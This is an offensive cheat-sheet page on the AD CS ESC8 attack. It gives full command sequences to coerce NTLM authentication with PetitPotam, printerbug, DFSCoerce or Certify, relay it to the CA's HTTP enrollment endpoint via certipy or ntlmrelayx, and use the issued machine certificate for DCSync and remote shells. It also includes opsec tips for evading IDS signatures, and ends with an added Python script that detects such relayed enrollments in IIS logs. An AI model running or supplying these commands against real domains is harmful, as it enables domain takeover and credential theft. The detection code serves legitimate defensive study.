ADCSESC8
ESC8: NTLM relay to the AD CS HTTP enrollment endpoint: coerce a machine account's NTLM authentication, relay it to the CA's web enrollment interface, and obtain a certificate for that machine account.
Applies to: network position for NTLM relay; AD CS web enrollment (HTTP) endpoint (/certsrv/) exposed; no enrollment rights required on the attacker account
Linux Abuse
certipy-ad relay (simplest; handles everything)
```bash
# Terminal 1: Start relay listener
certipy-ad relay -ca <ca-host> -template '<template>'
# Default template: Machine (for computer accounts); use DomainController for DCs

# Terminal 2: Coerce NTLM auth from target machine
# Option A: PetitPotam (unauthenticated on older Windows)
python3 PetitPotam.py <attacker-ip> <target-host>
# Option B: printerbug / SpoolSample
python3 printerbug.py '<domain>/<username>:<password>@<target-host>' <attacker-ip>
# Option C: DFSCoerce
python3 DFSCoerce.py -u '<username>' -p '<password>' -d '<domain>' <attacker-ip> <target-host>

# Certipy relay outputs: <target-computer>.pfx
# Authenticate with the obtained machine cert
certipy-ad auth -pfx <target-computer>.pfx -dc-ip <dc-ip>
# Returns: machine account NT hash + TGT

# If targeting a DC: run secretsdump with the machine account hash
secretsdump.py -hashes ':<ntlm-hash>' '<domain>/<target-computer>$@<dc-ip>'
```
ntlmrelayx (alternative; more control)
```bash
# Terminal 1: Start ntlmrelayx targeting CA web enrollment
ntlmrelayx.py -t "http://<ca-host>/certsrv/certfnsh.asp" \
    --adcs --template '<template>' -smb2support

# Terminal 2: Coerce NTLM auth from target
python3 PetitPotam.py <attacker-ip> <target-host>

# ntlmrelayx outputs a base64-encoded PFX
# Decode and save the PFX
echo '<base64-pfx>' | base64 -d > <target-computer>.pfx

# Authenticate
certipy-ad auth -pfx <target-computer>.pfx -dc-ip <dc-ip>
# Or use Rubeus (pass to Windows)
# Rubeus.exe asktgt /user:<target-computer>$ /certificate:<pfx-base64> /ptt
```
Post-cert: DC machine account hash to DCSync
```bash
# Got the DC machine account hash: perform DCSync
secretsdump.py -hashes ':<ntlm-hash>' '<domain>/<dc-name>$@<dc-ip>'

# Or use S4U2Self / RBCD or pass-the-hash for shells
getST.py -spn 'cifs/<dc-host>' -hashes ':<ntlm-hash>' '<domain>/<dc-name>$'
export KRB5CCNAME=Administrator.ccache
wmiexec.py -k -no-pass '<domain>/Administrator@<dc-host>'
```
Windows Abuse
Certify.exe coercion + ntlmrelayx
```text
# Terminal 1 (Linux attacker): Start relay
ntlmrelayx.py -t "http://<ca-host>/certsrv/certfnsh.asp" --adcs --template Machine

# Terminal 2 (Windows): Coerce auth from target
Certify.exe coerceauth /ca:<ca-host>\<ca> /target:<attacker-ip>
# Or: SpoolSample.exe <victim-host> <attacker-ip>
```
Requirements Checklist
- [ ] AD CS web enrollment enabled (/certsrv/ responding on HTTP/HTTPS)
- [ ] HTTPS NOT required for enrollment (HTTP accepted): check whether HTTPS is enforced; if so, the relay needs HTTPS support
- [ ] Target machine can be coerced (SpoolSvc running, or PetitPotam applicable)
- [ ] Template allows machine/computer enrollment (e.g., Machine, DomainController)
Opsec
- HTTP enrollment events logged on the CA (IIS logs + CA audit log).
- Coercion attempts generate Event ID 4624 (logon) on the coerced machine.
- PetitPotam may trigger IDS signatures; use less-signatured coercion methods (DFSCoerce, PrinterBug) where possible.
- The issued cert appears in the CA's Issued Certificates store attributed to the relayed machine identity.
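As an added defensive example (not from the original page), the following Python flags the trace the Opsec section describes in the CA's IIS log: a POST to /certsrv/certfnsh.asp authenticated as a machine account, rated high when the source address is not the one that machine normally uses. The W3C field names are IIS defaults; HOST_INVENTORY and SAMPLE_LOG are constructed for the example.

```python
"""Flag ESC8-style relayed enrollments in an AD CS web-enrollment IIS log.
Added example, not from the original page: the relay above leaves a POST to
/certsrv/certfnsh.asp on the CA authenticated as a machine account (name ends
in '$') from the relaying host's address rather than the machine's own.
HOST_INVENTORY and SAMPLE_LOG are constructed for the example."""
from dataclasses import dataclass
from typing import Optional

# Constructed inventory: the address each machine account is expected to use.
HOST_INVENTORY = {"CORP\\WS01$": "10.0.0.21", "CORP\\DC01$": "10.0.0.10"}
ENROLL_PATH = "/certsrv/certfnsh.asp"  # request-submission page used by ESC8

@dataclass(frozen=True)
class Finding:
    when: str
    account: str
    client_ip: str
    expected_ip: Optional[str]
    severity: str  # "high" = source differs from inventory, "medium" = unverified

def parse_iis_w3c(text: str) -> list:
    """Parse W3C extended log lines using the log's own #Fields: header."""
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            rows.append(dict(zip(fields, line.split())))
    return rows

def find_relayed_enrollments(text: str, inventory=HOST_INVENTORY) -> list:
    """One Finding per machine-account POST to the enrollment page."""
    findings = []
    for row in parse_iis_w3c(text):
        if row.get("cs-method") != "POST" or row.get("cs-uri-stem", "").lower() != ENROLL_PATH:
            continue
        user, ip = row.get("cs-username", "-"), row.get("c-ip", "-")
        if not user.endswith("$"):
            continue  # interactive user enrollment is the page's normal use
        expected = inventory.get(user)
        severity = "high" if expected is not None and expected != ip else "medium"
        findings.append(Finding(f"{row['date']} {row['time']}", user, ip, expected, severity))
    return findings

SAMPLE_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status
2024-05-01 10:00:09 10.0.0.5 POST /certsrv/certfnsh.asp - 80 CORP\\alice 10.0.0.50 200
2024-05-01 10:02:13 10.0.0.5 POST /certsrv/certfnsh.asp - 80 CORP\\DC01$ 10.0.0.99 200
2024-05-01 10:05:40 10.0.0.5 POST /certsrv/certfnsh.asp - 80 CORP\\WS01$ 10.0.0.21 200
"""
```

Run against the real log with `find_relayed_enrollments(open(path).read(), inventory)`; the "medium" findings still deserve a look, since machine accounts normally enroll over RPC/DCOM rather than the web page.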